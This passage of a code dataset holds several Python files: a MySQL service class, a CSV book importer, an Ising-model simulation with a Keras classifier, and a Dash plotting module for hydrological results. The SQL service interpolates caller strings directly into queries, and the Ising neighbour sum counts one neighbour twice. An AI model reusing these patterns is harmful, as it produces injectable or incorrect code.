sheet.cell(sheet.max_row+1,1,line)\n\n\n\n\n# for ws in wb:\n# if ws.cell(2,1).value==None:\n# wb.remove(ws)\nwb.save('result.xlsx')\nprint('book=',book)\nresult_file=log_name.replace('.','')+'.xlsx'\nwb.save(result_file)\n\n\n\n","sub_path":"Project/FE-4KB(BeiLun)/FE-4KB log.py","file_name":"FE-4KB log.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"604149287","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n__author__ = 'Liaoxiaoli'\nfrom models.dbDriver import MySqlDriver\nfrom models.caseService import CaseService\nimport logging\nimport time\n\nclass BasessService:\n def __init__(self):\n self.service = MySqlDriver()\n self.case = CaseService()\n self.table = \"busess\"\n\n def add(self, proj_id,bus_desc,creater,case_arry):\n add_item = \"(proj_id,bus_desc,creater,case_arry)\"\n add_value = (proj_id,bus_desc,creater,case_arry)\n try:\n result = self.service.insert(self.table,add_item,add_value)\n except Exception as e:\n logging.error(e)\n result = -1\n return result\n\n def update_byid(self,bus_id,proj_id,creater,bus_desc):#根据bus_id更新\n condition = \"bus_id=%d\" % bus_id\n update_value = \"proj_id=%d,creater='%s',bus_desc='%s'\" % (proj_id,creater,bus_desc)\n try:\n result = self.service.update(self.table, condition, update_value)\n except Exception:\n result = -1\n return result\n\n def update_cases_byid(self,bus_id,case_arry):#根据bus_id更新用例列表\n condition = \"bus_id=%d\" % bus_id\n update_value = \"case_arry='%s'\" % (case_arry)\n try:\n result = self.service.update(self.table, condition, update_value)\n except Exception:\n result = -1\n return result\n\n def delete_byid(self, bus_id):\n condition = \"bus_id=%d\" % bus_id\n try:\n self.result_num = self.service.delete(self.table, condition)\n except Exception:\n self.result_num = -1\n return self.result_num\n\n def list_by_projid(self, proj_id, pagenow=1, pagesize=10):\n condition = \"proj_id=%d\" % 
proj_id\n try:\n results = self.service.query_byitem(self.table,condition,\"bus_id\",pagenow, pagesize)\n except Exception:\n results = -1\n return results\n\n def list_all(self, pagenow=1, pageSize=10): # 获取指定表中所有线数据的list,并分页显示\n try:\n results = self.service.query_byitem(self.table,\"1=1\", \"bus_id\", pagenow, pageSize)\n except Exception:\n results = -1\n return results\n\n def list_case_bybusid(self,bus_id):\n sql_req = \"select case_arry from busess where bus_id =%d\"%bus_id\n try:\n tmp = self.service.exe_query(sql_req)\n results = self.case.list_req_caseid(tmp[0][0])\n except Exception as e:\n results = -1\n return results\n\n def get_bybusid(self,bus_id):\n sql_req = \"select bus_id,proj_id,bus_desc,creater from busess where bus_id =%d\"%bus_id\n try:\n results = self.service.exe_query(sql_req)\n # results = self.case.list_req_caseid(tmp[0][0])\n except Exception as e:\n results = -1\n return results\n\n def detail_bybusid(self,bus_id):\n sql_req = \"select * from busess where bus_id =%d\"%bus_id\n try:\n detail = self.service.exe_query(sql_req)[0]\n caseids = detail[3].strip(\"(\").strip(\")\").split(\",\")\n cases = []\n for caseid in caseids:\n case = self.case.list_req_caseid((caseid,))\n if case == -1 or len(case) == 0:\n continue\n cases.append(case[0])\n # cases = self.case.list_req_caseid(detail[3])\n if cases == -1 or len(cases) == 0:\n cases = ()\n except Exception as e:\n return -1\n return detail, cases","sub_path":"models/busessService.py","file_name":"busessService.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"591563484","text":"#model importing from csv file\nimport os\nimport csv\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\nengine = create_engine(os.getenv(\"DATABASE_URL\")) # database engine object from SQLAlchemy that manages connections to the database\n # DATABASE_URL is an 
environment variable that indicates where the database lives\ndb = scoped_session(sessionmaker(bind=engine)) # create a 'scoped session' that ensures different users' interactions with the \n\ntable_name=\"books\"\n\n\n\nfile = open(\"books.csv\")\nreader = csv.reader(file)\nnext(reader)\nfor isbn, title, author, year in reader:\n\n db.execute(f\"INSERT INTO {table_name} (isbn, title, author, year) VALUES(:isbn, :title, :author, :year)\",\n {'isbn': isbn, 'title': title, 'author': author, 'year': year})\n\n print(f\"Added book: {isbn}, {title}, {author}, {year}\")\ndb.commit()\n","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"452498572","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef init_state(size):\n\tstate = np.zeros((size, size))\n\tfor i in range(size):\n\t\tfor j in range(size):\n\t\t\tif np.random.rand() > 0.5:\n\t\t\t\tstate[i][j] = 1\n\t\t\telse:\n\t\t\t\tstate[i][j] = -1\n\treturn state\n\ndef ising_energy(state, J):\n\tsize = len(state)\n\tE = 0\n\tfor i in range(len(state)):\n\t\tfor j in range(len(state)):\n\t\t\tE -= J* state[i][j]*sum_neighbors(state, i, j)\n\treturn E\n\ndef sum_neighbors(state, i, j):\n\tsize = len(state)\n\tleft_neighbor = state[(i-1) %size][j]\n\tright_neighbor = state[(i+1)% size][j]\n\tup_neighbor = state[i][(j-1)% size]\n\tdown_neighbor = state[i][(j-1)%size]\n\n\treturn left_neighbor+right_neighbor+down_neighbor+up_neighbor\n\ndef metropolis(state, kT, J):\n size = len(state)\n iterations = 1000\n\n for i in range(iterations):\n for j in range(size**2):\n row = int(np.random.random()*size)\n col = int(np.random.random()*size)\n\n spin = state[row, col]\n neighbor = sum_neighbors(state, row, col)\n\n dE = 2 * J * spin * neighbor\n\n prob = np.exp(-dE/kT)\n\n if dE <=0 or np.random.random() <=prob:\n state[row, col] = - state[row, col]\n return state\n\n\n# MAKE NN 
DATA\n\n## ORDERED ISING STATES\n\nordered = []\nlow_temps = np.linspace(0.1, 1.8, 10)\nwhile len(ordered) < 500:\n for t in low_temps:\n state = init_state(8)\n state = metropolis(state, t, 1)\n ordered.append(state)\nprint('Done with ordered')\n\n## DISORDERED ISING STATES\n\ndisordered = []\nhigh_temps = np.linspace(2.6, 4, 10)\nwhile len(disordered) < 500:\n for t in high_temps:\n state = init_state(8)\n state = metropolis(state, t, 1)\n disordered.append(state)\nprint('Done with disordered')\n# 0 will represnt an ordered state and 1 will represent a disordered state\n\ndata = []\nanswers = []\nN = len(disordered)\nfor i in range(N):\n if np.random.rand() > 0.5:\n data.append(disordered[i])\n answers.append(1)\n else:\n data.append(ordered[i])\n answers.append(0)\nprint('Made DATA')\n\n\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\n\nx_train = np.array(data[:400])\nx_train = x_train.reshape(400, 8, 8, 1)\nx_test = np.array(data[400:])\nx_test = x_test.reshape(100, 8, 8, 1)\n\nnum_classes = 2\ny_train = np.array(answers[:400])\ny_test = np.array(answers[400:])\n\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\ndef Model(x_train, y_train, x_test, y_test, epochs):\n batch_size = 128\n epochs = epochs\n num_classes = 2\n model = Sequential()\n model.add(Conv2D(32, kernel_size=(2,2), activation = 'relu', input_shape= (8,8,1)))\n model.add(Flatten())\n model.add(Dense(num_classes, activation = 'softmax'))\n model.compile(loss= keras.losses.categorical_crossentropy,\n optimizer = keras.optimizers.Adadelta(),\n metrics = ['accuracy'])\n history = model.fit(x_train, y_train,\n batch_size= batch_size,\n epochs = epochs,\n verbose = 1, validation_data = (x_test, y_test))\n return model, history\n\n\nmodel, history = Model(x_train, y_train, x_test, y_test, 100)\n\nfig, ax = plt.subplots(1,2, figsize = 
(7,5))\n#ax[0].set_aspect('auto')\nax[0].plot(history.history['acc'], linewidth = 2, linestyle = '--', label = 'Train')\nax[0].plot(history.history['val_acc'],linewidth = 2, linestyle = '--', label = 'Test')\nax[0].set_title('NN Accuracy')\nax[0].set_xlabel('Epoch')\nax[0].set_ylabel('Accuracy')\nax[0].legend(loc = 'best')\n#ax[1].set_aspect('auto')\nax[1].plot(history.history['loss'], linewidth = 2, linestyle = '--', label = 'Train')\nax[1].plot(history.history['val_loss'],linewidth = 2, linestyle = '--', label = 'Test')\nax[1].set_title('NN Loss')\nax[1].set_xlabel('Epoch')\nax[1].set_ylabel('Loss')\nax[1].legend(loc = 'best')\nfig.subplots_adjust(right = 2)\nplt.savefig('cnn_training.png', bbox_inches = 'tight')\nplt.show()\n","sub_path":"Ising Model/src/2d IsingModel/neural net/ising_nn.py","file_name":"ising_nn.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"283373670","text":"from itertools import product\nimport os\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport plotly.graph_objs as go\nimport dash_core_components as dcc\nimport dash_daq as daq\nimport dash_html_components as html\n\nfrom dashapp.metrics import nash_sutcliffe_efficiency, percent_bias, root_mean_square_error\nfrom dashapp.functions import get_resources, flow_to_energy, consolidate_dataframe, load_timeseries, agg_by_resources\nfrom dashapp.constants import PLOTLY_CONFIG, ABS_DIFF, PCT_DIFF, MCM_TO_CFS, MCM_TO_TAF, PROD_RESULTS_PATH, \\\n DEV_RESULTS_PATH, BASINS\n\nOBSERVED_TEXT = 'Observed'\nOBSERVED_COLOR = 'lightgrey'\n\nAXIS_LABELS = {\n 'storage': 'Storage (TAF)',\n 'flow': 'Flow (cfs)',\n 'generation': 'Generation (MWh)',\n 'M': 'Month',\n 'Y': 'Year'\n}\n\nPALETTES = {\n 'P2009': 'Blues_r',\n 'P2030': 'BuGn_r',\n 'P2060': 'OrRd_r'\n}\n\nFLOOD_CONTROL_RESERVOIRS = ['New Melones Lake', 'Lake Tulloch', 'Don Pedro Reservoir', 'Millerton 
Lake']\n\npercentiles_ordered = {\n ('median', 'quartiles'): ['quartiles', 'median'],\n ('median', 'quartiles', 'range'): ['range', 'quartiles', 'median'],\n ('quartiles', 'range'): ['range', 'quartiles'],\n ('median', 'range'): ['range', 'median']\n}\n\n\ndef indicator(id, label, value, color):\n return html.Div(\n [\n label + ': ', value,\n daq.Indicator(\n color=color,\n value=True\n )\n ],\n id=id,\n style={'display': 'inline-block'}\n )\n\n\ndef percentile_timeseries_graphs(df, name, options, color='black'):\n pcts = []\n show_mean = False\n percentiles = options[:]\n if 'mean' in options:\n show_mean = True\n percentiles.pop(options.index('mean'))\n\n pct_set = tuple(set(percentiles))\n\n span_pcts = {\n 'median': [0.5],\n 'quartiles': [0.25, 0.75],\n 'range': [0.0, 1.0]\n }\n\n lines = []\n for i, span in enumerate(percentiles_ordered.get(pct_set, list(pct_set))):\n pcts = span_pcts[span]\n for j, pct in enumerate(pcts):\n fill = None\n showlegend = i == 0\n width = 2\n opacity = 0.0\n if len(pcts) > 1:\n width = 0\n if j == 0:\n showlegend = False\n elif j == 1:\n fill = 'tonexty'\n lines.append(\n go.Scatter(\n x=df.index,\n y=df.quantile(pct, axis=1),\n showlegend=showlegend,\n mode='lines',\n fill=fill,\n text='{}: {}%'.format(name, pct * 100),\n name=name,\n line=dict(color=color, width=width)\n )\n )\n if show_mean:\n lines.append(\n go.Scatter(\n x=df.index,\n y=df.mean(axis=1),\n showlegend=False,\n mode='lines',\n text='{} mean'.format(name),\n name=name,\n # line=dict(color=color, width=3)\n )\n )\n\n return lines\n\n\ndef boxplots_graphs(df, name, percentiles, color='black'):\n plot = go.Box(\n y=df.values.flatten(),\n name=name,\n )\n return [plot]\n\n\ndef timeseries_component(attr, res_name, all_sim_vals, df_obs, **kwargs):\n res_name_id = res_name.lower().replace(' ', '_')\n ts_data = []\n fd_data = []\n\n gauge_lookup = kwargs.get('gauge_lookup')\n metric = kwargs.get('metric')\n metric = metric != 'default' and metric\n resample = 
kwargs.get('resample')\n constraints = kwargs.get('constraints', [])\n percentiles = kwargs.get('percentiles')\n consolidate = kwargs.get('consolidate')\n calibration = kwargs.get('calibration')\n climates = kwargs.get('climates')\n rcps = kwargs.get('rcps')\n percentiles_type = kwargs.get('percentiles_type', 'timeseries')\n scenario_combos = kwargs.get('scenario_combos', [])\n head = kwargs.get('head')\n layout = kwargs.get('layout_options', [])\n compact = kwargs.get('compact', False)\n show_fd = 'flow-duration' in layout and not compact\n show_fc = 'guide' in constraints\n color_idx = -1\n\n # Variables for observed data\n obs_vals = None\n gauges = []\n gauge_name = gauge_lookup.get(res_name, res_name)\n\n fc_df = None\n if attr == 'storage' and show_fc and res_name in FLOOD_CONTROL_RESERVOIRS:\n basin = kwargs.get('basin')\n basin_full_name = '{} River'.format(BASINS[basin])\n data_path = os.environ['SIERRA_DATA_PATH']\n filename = '{} Flood Control Curve mcm.csv'.format(res_name)\n fcpath = os.path.join(data_path, basin_full_name, 'management', 'BAU', 'Flood Control', filename)\n flood_control_curve = pd.read_csv(fcpath, index_col=0, header=0).iloc[:, 0] / 1.2335 # mcm to TAF\n fc_df = pd.DataFrame(index=all_sim_vals.index)\n fc_df['Rainflood space'] = fc_df.index.strftime('%#m-%#d')\n fc_df.replace({'Rainflood space': flood_control_curve}, inplace=True)\n\n ts_data.append(\n go.Scatter(\n x=fc_df.index,\n y=fc_df['Rainflood space'],\n text='Flood Curve',\n mode='lines',\n opacity=0.7,\n # opacity=0.7 if not plot_max else 0.0,\n name='Flood Curve',\n line_color='red'\n )\n )\n\n for i, forcing in enumerate(set(all_sim_vals.columns.get_level_values(0))):\n parts = forcing.split('/')[1].split('_')\n rcp = None\n if len(parts) == 1:\n gcm, = parts\n else:\n gcm, rcp = parts\n\n if climates and gcm not in climates:\n continue\n\n if 'Livneh' not in forcing and rcps and rcp not in rcps:\n continue\n\n # sim_color = 
sns.color_palette(PALETTES[priceyear]).as_hex()[GCMS.index(gcm)]\n # sim_color = sns.color_palette().as_hex()[i]\n # sim_color = None\n resource_scenario_sim_vals = all_sim_vals[forcing, res_name]\n # for multiindex in resource_scenario_sim_vals.columns:\n # sim_vals = resource_scenario_sim_vals[multiindex]\n for i, scenario_combo in enumerate(scenario_combos):\n\n color_idx += 1\n sim_color = sns.color_palette().as_hex()[color_idx]\n\n if scenario_combo:\n scenario_name = '{} {}'.format(tuple(parts), scenario_combo)\n else:\n scenario_name = '-'.join(tuple(parts))\n\n if not scenario_combo:\n sim_vals = resource_scenario_sim_vals\n else:\n if len(scenario_combo) == 1:\n sim_vals = resource_scenario_sim_vals[scenario_combo[0]]\n else:\n sim_vals = resource_scenario_sim_vals[scenario_combo]\n if gcm == 'Livneh':\n sim_vals = sim_vals[sim_vals.index.year < 2020]\n else:\n sim_vals = sim_vals[sim_vals.index.year >= 2020]\n if head is not None:\n sim_vals = flow_to_energy(sim_vals, head)\n if resample:\n sim_resampled = sim_vals.dropna().resample(resample).mean()\n else:\n sim_resampled = sim_vals.dropna()\n\n # Prepare observed data\n if i == 0:\n obs_resampled = None\n if calibration and gauge_name in df_obs:\n obs_vals = df_obs[gauge_name]\n\n head = kwargs.get('head')\n if head:\n obs_vals = flow_to_energy(obs_vals, head)\n\n if not consolidate: # percentiles values will use the whole record\n obs_vals = obs_vals.reindex(sim_vals.index)\n\n if resample:\n obs_resampled = obs_vals.resample(resample, axis=0).mean()\n else:\n obs_resampled = obs_vals\n\n if consolidate: # use original values\n obs_cons = consolidate_dataframe(obs_resampled, resample)\n obs_vals = obs_cons.quantile(0.5, axis=1) # for use in flow-duration curve\n\n if metric == ABS_DIFF:\n sim_resampled -= obs_resampled\n elif metric == PCT_DIFF:\n sim_resampled = (sim_resampled / obs_resampled - 1.0) * 100.0\n\n plot_max = False\n max_reqt = kwargs.get('max_reqt')\n if max_reqt is not None and res_name 
in max_reqt[forcing] and 'max' in constraints:\n plot_max = True\n\n # Minimum flow requirement\n min_reqt = kwargs.get('min_reqt')\n show_min_reqt = not consolidate and min_reqt is not None and res_name in min_reqt[forcing] and 'min' in constraints\n if show_min_reqt:\n if resample:\n min_reqt_resampled = min_reqt.resample(resample).mean()\n else:\n min_reqt_resampled = min_reqt.copy()\n ts_data.append(\n go.Scatter(\n x=min_reqt_resampled[forcing].index,\n y=min_reqt_resampled[forcing][res_name],\n text='Min Flow',\n mode='lines',\n opacity=0.7,\n # opacity=0.7 if not plot_max else 0.0,\n name='Min Flow',\n line_color='red'\n )\n )\n\n # Maximum flow requirement\n if not consolidate and plot_max:\n ts_data.append(\n go.Scatter(\n x=max_reqt[forcing].index,\n y=max_reqt[forcing][res_name],\n text='Max Requirement',\n mode='lines',\n fill='tonexty',\n opacity=0.7,\n name='Max Requirement',\n line_color='lightblue',\n line=dict(width=0.5)\n )\n )\n\n if consolidate:\n try:\n sim_cons = consolidate_dataframe(sim_resampled, resample)\n except:\n print('Failed to consolidate: ', forcing)\n continue\n if percentiles_type == 'timeseries':\n sim_vals = sim_cons.quantile(0.5, axis=1)\n sim_data = percentile_timeseries_graphs(sim_cons, scenario_name, percentiles, color=sim_color)\n else:\n sim_data = boxplots_graphs(sim_cons, scenario_name, percentiles, color=sim_color)\n ts_data.extend(sim_data)\n\n else:\n ts_data.append(\n go.Scatter(\n x=sim_resampled.index,\n y=sim_resampled.values,\n text=scenario_name,\n mode='lines',\n opacity=0.7,\n name=scenario_name,\n line=dict(color=sim_color)\n )\n )\n\n N = len(sim_resampled)\n if show_fd:\n fd_data.append(\n go.Scatter(\n y=sorted(sim_resampled.values),\n x=np.arange(0, N) / N * 100,\n name=scenario_name,\n text=scenario_name,\n # line=dict(color=sim_color),\n mode='lines',\n opacity=0.7,\n )\n )\n\n pbias = 100\n nse = -1\n\n if calibration and obs_resampled is not None and not metric:\n\n # flow-duration curve\n N = 
len(obs_resampled)\n if show_fd:\n fd_data.insert(0,\n go.Scatter(\n y=sorted(obs_resampled.values),\n x=np.arange(0, N) / N * 100,\n name=OBSERVED_TEXT,\n text=OBSERVED_TEXT,\n mode='lines',\n opacity=0.7,\n line=dict(color=OBSERVED_COLOR)\n )\n )\n\n if consolidate:\n predictions = sim_resampled.values\n targets = obs_resampled.loc[sim_resampled.index].values\n else:\n predictions = sim_vals.values\n targets = obs_vals.loc[sim_vals.index].values\n\n pbias = percent_bias(predictions, targets) * 100\n # rmse = root_mean_square_error(predictions, targets)\n nse = nash_sutcliffe_efficiency(predictions, targets)\n\n if consolidate:\n obs_data = None\n if percentiles_type == 'timeseries':\n obs_data = percentile_timeseries_graphs(obs_cons, OBSERVED_TEXT, percentiles, color=OBSERVED_COLOR)\n elif percentiles_type == 'boxplots':\n obs_data = boxplots_graphs(obs_cons, OBSERVED_TEXT, percentiles, color=OBSERVED_COLOR)\n ts_data.extend(obs_data)\n else:\n obs_graph = go.Scatter(\n x=obs_resampled.index,\n y=obs_resampled,\n connectgaps=False,\n text=OBSERVED_TEXT,\n mode='lines',\n opacity=0.7,\n name=OBSERVED_TEXT,\n line=dict(color=OBSERVED_COLOR)\n )\n ts_data.insert(0, obs_graph)\n\n if calibration:\n if nse <= 0:\n nse_color = 'red'\n elif nse <= 0.5:\n nse_color = 'orange'\n else:\n nse_color = 'green'\n\n GAUGE_SIZE = 80\n\n nse_gauge = daq.Gauge(\n id='nse-gauge-' + res_name_id,\n label='NSE',\n size=GAUGE_SIZE,\n min=-1.0,\n value=nse,\n max=1.0,\n color=nse_color,\n )\n # nse_gauge = indicator(\n # id='nse-gauge-' + res_name_id,\n # label='NSE',\n # value=round(nse, 2),\n # color=nse_color,\n # )\n\n if abs(pbias) >= 20:\n pbias_color = 'red'\n elif abs(pbias) >= 10:\n pbias_color = 'orange'\n else:\n pbias_color = 'green'\n\n pbias_gauge = daq.Gauge(\n id='pbias-gauge-' + res_name_id,\n label='% bias',\n size=GAUGE_SIZE,\n min=min(pbias, -100.0),\n value=pbias,\n max=max(pbias, 100.0),\n color=pbias_color\n )\n # pbias_gauge = indicator(\n # id='pbias-gauge-' + 
res_name_id,\n # label='% bias',\n # value=round(pbias, 2),\n # color=pbias_color\n # )\n\n gauges = html.Div(\n [nse_gauge, pbias_gauge]\n )\n\n ylabel = AXIS_LABELS.get(attr, 'unknown')\n\n CLASS_NAME = 'timeseries-chart'\n PLOTLY_CONFIG['displayModeBar'] = not compact and 'toolbar' in layout\n\n if compact:\n style = {\n 'height': 200,\n 'width': 400\n }\n elif show_fd:\n style = {\n 'height': 300,\n 'width': \"70%\"\n }\n else:\n style = {\n 'height': 300,\n 'width': \"100%\"\n }\n\n layout_kwargs = dict(\n xaxis={'title': AXIS_LABELS.get(resample, \"Date\"), 'tickangle': -45},\n yaxis={'title': ylabel, 'rangemode': 'tozero'},\n margin={'l': 60, 'b': 80, 't': 40, 'r': 10},\n showlegend=not compact,\n legend={'x': 0.02, 'y': 0.98},\n hovermode='closest',\n yaxis_type=kwargs.get('transform', 'linear'),\n )\n if compact:\n del layout_kwargs['xaxis']['title']\n layout_kwargs['margin'].update(b=60, t=30)\n layout_kwargs['title'] = res_name\n\n timeseries_graph = dcc.Graph(\n id='timeseries-{}'.format(res_name_id),\n # className=CLASS_NAME,\n style=style,\n config=PLOTLY_CONFIG,\n figure={\n 'data': ts_data,\n 'layout': go.Layout(\n **layout_kwargs\n ),\n }\n )\n\n children = [timeseries_graph]\n\n if show_fd:\n flow_duration_graph = dcc.Graph(\n id='flow-duration-' + res_name_id,\n className='flow-duration-chart',\n config=PLOTLY_CONFIG,\n figure={\n 'data': fd_data,\n 'layout': go.Layout(\n # title='{}-duration'.format(attr.title()),\n xaxis={'title': 'Duration (%)'},\n yaxis={'title': ylabel},\n margin={'l': 60, 'b': 80, 't': 40, 'r': 10},\n legend={'x': 0.05, 'y': 0.95},\n hovermode='closest',\n yaxis_type=kwargs.get('transform', 'linear')\n )\n },\n style={\"width\": \"30%\"}\n )\n children.append(flow_duration_graph)\n\n div = html.Div(\n # key='{}'.format(consolidate),\n children=[\n not compact and html.H5(res_name),\n html.Div(\n children=children,\n className=\"timeseries-metrics-data\",\n )\n ],\n className=\"timeseries-metrics-box\",\n style={\n 'margin': 
10 if compact else 'initial'\n }\n )\n\n return div\n\n\ndef timeseries_collection(tab, **kwargs):\n children = []\n resources = kwargs.pop('resources', None)\n basin_scenarios = kwargs.pop('basin_scenarios', {})\n selected_scenarios = kwargs.pop('selected_scenarios', [])\n gauge_lookup = kwargs.get('gauge_lookup')\n df_obs_streamflow = kwargs.pop('df_obs_streamflow', None)\n df_obs_storage = kwargs.pop('df_obs_storage', None)\n consolidate = \"consolidate\" in kwargs.get('consolidate', [])\n kwargs['consolidate'] = consolidate\n kwargs['compact'] = compact = 'compact' in kwargs.get('layout_options', [])\n\n resample = kwargs.get('resample')\n aggregate = kwargs.get('aggregate')\n basin = kwargs.get('basin')\n if not basin:\n return [\"Select a basin.\"]\n\n climates = kwargs.get('climates')\n rcps = kwargs.get('rcps')\n calibration = climates is None\n run_name = kwargs.get('run_name', 'development')\n\n load_data_kwargs = dict(\n run=run_name,\n nscenarios=max(len(basin_scenarios), 1),\n aggregate=aggregate,\n filterby=resources,\n basin_scenarios=basin_scenarios\n )\n\n kwargs['scenario_combos'] = list(product(*selected_scenarios))\n\n if run_name == 'development':\n results_path = DEV_RESULTS_PATH\n else:\n results_path = os.path.join(PROD_RESULTS_PATH, run_name)\n\n kwargs['calibration'] = calibration\n\n if calibration:\n forcings = ['historical/Livneh']\n else:\n # rcp = 'rcp85'\n forcings = list(product(climates, rcps))\n if not forcings:\n return \"Please select at least one climate and rcp\"\n\n if consolidate and resample == 'Y':\n return 'Sorry, you cannot consolidate annually resampled data.'\n\n facility_class, attr, unit = tab.split('-')\n\n if tab == 'reservoir-storage':\n attr = 'storage'\n df_storage = load_timeseries(results_path, basin, forcings, 'Reservoir', 'Storage',\n multiplier=MCM_TO_TAF, **load_data_kwargs)\n kwargs.pop('transform', None)\n if resample:\n obs = df_obs_storage.resample(resample).mean()\n else:\n obs = df_obs_storage\n 
filtered_resources = get_resources(df_storage, filterby=aggregate or resources)\n for res in filtered_resources:\n component = timeseries_component(attr, res, df_storage, obs, **kwargs)\n children.append(component)\n\n else:\n df_hp_flow = None\n # df_obs = df_obs_streamflow.loc[df_hydropower.index]\n if resample:\n obs = df_obs_streamflow.resample(resample).mean()\n else:\n obs = df_obs_streamflow\n\n if tab in ['hydropower-generation', 'hydropower-flow', 'system']:\n hp = []\n df_hp1 = None\n df_hp2 = None\n\n try:\n df_hp1 = load_timeseries(results_path, basin, forcings, 'PiecewiseHydropower', 'Flow',\n **load_data_kwargs) * MCM_TO_CFS\n except:\n pass\n if df_hp1 is not None:\n hp.append(df_hp1)\n\n try:\n df_hp2 = load_timeseries(results_path, basin, forcings, 'Hydropower', 'Flow',\n **load_data_kwargs) * MCM_TO_CFS\n except:\n pass\n if df_hp2 is not None:\n hp.append(df_hp2)\n if hp:\n df_hp_flow = pd.concat(hp, axis=1)\n\n if aggregate and df_hp_flow is not None:\n df_hp_flow = agg_by_resources(df_hp_flow, aggregate)\n\n if tab in ['hydropower-generation', 'system']:\n path = '../data/{} River/fixed_head.csv'.format(basin.title())\n if os.path.exists(path):\n fixed_head = pd.read_csv(path, index_col=0, squeeze=True).to_dict()\n else:\n fixed_head = {}\n\n if tab == 'hydropower-flow':\n attr = 'flow'\n if df_hp_flow is not None:\n for res in get_resources(df_hp_flow, filterby=aggregate or resources):\n component = timeseries_component(attr, res, df_hp_flow, obs, **kwargs)\n children.append(component)\n\n elif tab == 'hydropower-generation':\n attr = 'generation'\n if df_hp_flow is not None:\n for res in get_resources(df_hp_flow, filterby=resources):\n if res not in fixed_head:\n continue # TODO: update to include non-fixed head\n head = fixed_head[res]\n component = timeseries_component(attr, res, df_hp_flow, obs, head=head, **kwargs)\n children.append(component)\n\n elif tab == 'outflow':\n attr = 'flow'\n df = load_timeseries(results_path, basin, forcings, 
'Output', 'Flow',\n multiplier=MCM_TO_CFS, **load_data_kwargs)\n for res in get_resources(df, filterby=resources):\n component = timeseries_component(attr, res, df, obs, **kwargs)\n children.append(component)\n\n # elif tab == 'ifr-flow':\n # attr = 'flow'\n # df = load_timeseries(results_path, basin, forcings, 'InstreamFlowRequirement', 'Flow',\n # multiplier=MCM_TO_CFS, **load_data_kwargs)\n # reqt = load_timeseries(results_path, basin, forcings, 'InstreamFlowRequirement', 'Requirement',\n # multiplier=MCM_TO_CFS, **load_data_kwargs)\n # for res in get_resources(df, filterby=resources):\n # component = timeseries_component(attr, res, df, obs, min_reqt=reqt, **kwargs)\n # children.append(component)\n\n elif tab == 'ifr-flow':\n attr = 'flow'\n # if basin == 'stn':\n # pywr_param_name = 'PiecewiseInstreamFlowRequirement'\n # else:\n pywr_param_name = 'InstreamFlowRequirement'\n df = load_timeseries(results_path, basin, forcings, pywr_param_name, 'Flow',\n multiplier=MCM_TO_CFS, **load_data_kwargs)\n df_pw_min_ifr_reqt = load_timeseries(\n results_path, basin, forcings, pywr_param_name, 'Min Flow',\n multiplier=MCM_TO_CFS, **load_data_kwargs)\n df_pw_ifr_range_reqt = load_timeseries(\n results_path, basin, forcings, pywr_param_name, 'Max Flow',\n multiplier=MCM_TO_CFS, **load_data_kwargs)\n\n if df_pw_min_ifr_reqt is not None and df_pw_ifr_range_reqt is not None:\n df_pw_max_ifr_reqt = df_pw_min_ifr_reqt[df_pw_ifr_range_reqt.columns] + df_pw_ifr_range_reqt\n else:\n df_pw_max_ifr_reqt = None\n\n for res in get_resources(df, filterby=resources):\n component = timeseries_component(\n attr, res, df, obs,\n min_reqt=df_pw_min_ifr_reqt,\n max_reqt=df_pw_max_ifr_reqt,\n **kwargs\n )\n children.append(component)\n\n elif tab == 'system':\n\n # System generation\n system_res = 'System generation'\n if df_hp_flow is not None:\n gauged_hp = [c for c in df_hp_flow.columns if gauge_lookup.get(c) in obs]\n gauge_lookup[system_res] = system_res\n\n df_sim_scenarios = []\n df_obs 
= []\n df_sim_system = None\n df_obs_system = None\n for i, forcing in enumerate(forcings):\n dfs_sim = []\n for res in get_resources(df_hp_flow):\n head = fixed_head.get(res)\n hp_gauge = gauge_lookup.get(res)\n if not head or not hp_gauge:\n continue\n sim_energy = flow_to_energy(df_hp_flow[forcing, res], head)\n dfs_sim.append(sim_energy)\n if i == 0:\n obs_energy = flow_to_energy(obs[hp_gauge], head)\n df_obs.append(obs_energy)\n if dfs_sim:\n concatenated_summed = pd.concat(dfs_sim, axis=1).dropna().sum(axis=1)\n df_sim_scenarios.append(concatenated_summed)\n if df_sim_scenarios:\n df_sim_system = pd.concat(df_sim_scenarios, axis=1, keys=forcings)\n df_sim_system.columns = pd.MultiIndex.from_product([forcings, (system_res,)])\n\n if df_obs:\n df_obs_system = pd.concat(df_obs, axis=1).sum(axis=1).to_frame(system_res)\n\n if df_sim_system is not None:\n hp_component = timeseries_component('generation', system_res, df_sim_system, df_obs_system,\n **kwargs)\n children.append(hp_component)\n\n return html.Div(\n children=children,\n className=\"timeseries-collection\",\n style={\n 'display': 'flex',\n 'flexWrap': 'wrap',\n 'flexDirection': 'column' if not compact else None\n }\n )\n","sub_path":"dashapp/components - old.py","file_name":"components - old.py","file_ext":"py","file_size_in_byte":26718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"206462611","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom kivy.uix.screenmanager import Screen\nfrom kivy.properties import StringProperty\nfrom kivy.core.text import Label as CoreLabel\nfrom kivy.graphics.texture import Texture\nfrom kivy.graphics import Rectangle\nfrom kivy.clock import Clock\nimport iod.switches as sw\nfrom Queue import Queue\nimport time\nimport cv2\nimport os\n\nLABEL = ['2L', 'L', 'M', 'S', '2S', 'BL', 'BM', 'BS', 'C', 'None']\n\nSTATE_SPLASH = 0\nSTATE_CAPTURING = 
